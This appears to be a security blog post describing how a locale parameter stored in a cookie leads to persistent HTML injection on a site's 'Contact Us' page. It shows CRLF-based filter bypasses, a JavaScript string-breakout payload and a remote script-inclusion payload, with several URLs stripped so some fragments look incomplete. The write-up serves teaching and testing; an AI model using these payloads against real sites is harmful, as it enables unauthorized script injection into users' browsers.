Sites that wish to appeal to a global audience use internationalization and localization techniques that substitute text and presentation styles based on a user’s language preferences. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encoding like UTF-8 were designed so apps could easily represent the written symbols for these languages.

A site’s written language conveys meaning to its visitors. A site’s programming language gives headaches to its developers. Misguided devs like to explain why their favored language is superior. Those same devs often prefer not to explain how they end up creating HTML injection vulns with their superior language.

Several previous posts here have shown how HTML injection attacks are reflected from a URL parameter into a web page, or even how the URL fragment – which doesn’t make a round trip to the app – isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, with the payload having been stored somewhere for later retrieval, such as being associated with a user’s session.

Sometimes the attack persists in the cookie itself.

Here’s a site that tracks a locale parameter in the URL, right where we like to test for vulns like XSS.

There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

Sadly, no reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How impolite and inhibiting to our attacks.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.

The catch is that some key characters in the attack have been rendered as their HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body>:

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&# 034;&gt;



And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&# 034;&gt;



And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;


" id="currentLocale" />

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages.

With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag in the following example. We seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
<html xmlns="" lang="en-US">


" xml:lang="en-US">


"> <head>

Plus, something we hadn’t seen before on this site – a reflection inside a JavaScript variable near the bottom of the <body> element.

(HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!-- Include the Reference Page Tag script -->
<script> var v = {}; v["v_locale"] = 'en_US"&gt;


'; </script>

Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:">%0A%0D';alert(9)//

Too bad the apostrophe character (‘) remains encoded:

<script> var v = {}; v["v_locale"] = 'en_US&# 034;&gt;

&# 039;;alert(9)//'; </script>

That countermeasure shouldn’t stop us. This site’s developers took the time to write some insecure code. The least we can do is spend the time to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

As expected, the’s response contains the HTML encoded version of the payload. We lose quotes, but some of them are actually superfluous for this payload.

<body id="lang-en" class="tier-level-one cntry-US&# 034;&gt;

&lt;script src=&# 034; 034;&gt;&lt;/script&gt;


Now, if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by

<html xmlns="" lang="en-US">

<script src=""></script>

" xml:lang="en-US">

<script src=""></script>

"> <head>

Yé! utúvienyes!

I have found it! But what was the underlying mechanism? The GET request to the contact page didn’t contain the payload. It’s just:

Thus, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A; JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F;
  sessionLocale="en_US\\"> <script src=\\"\\"></script> ";

Sometime between the request to and the contact page the site decided to place the locale parameter from into a cookie. Then, the site took the cookie’s value from request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript), and let the user specify a custom locale.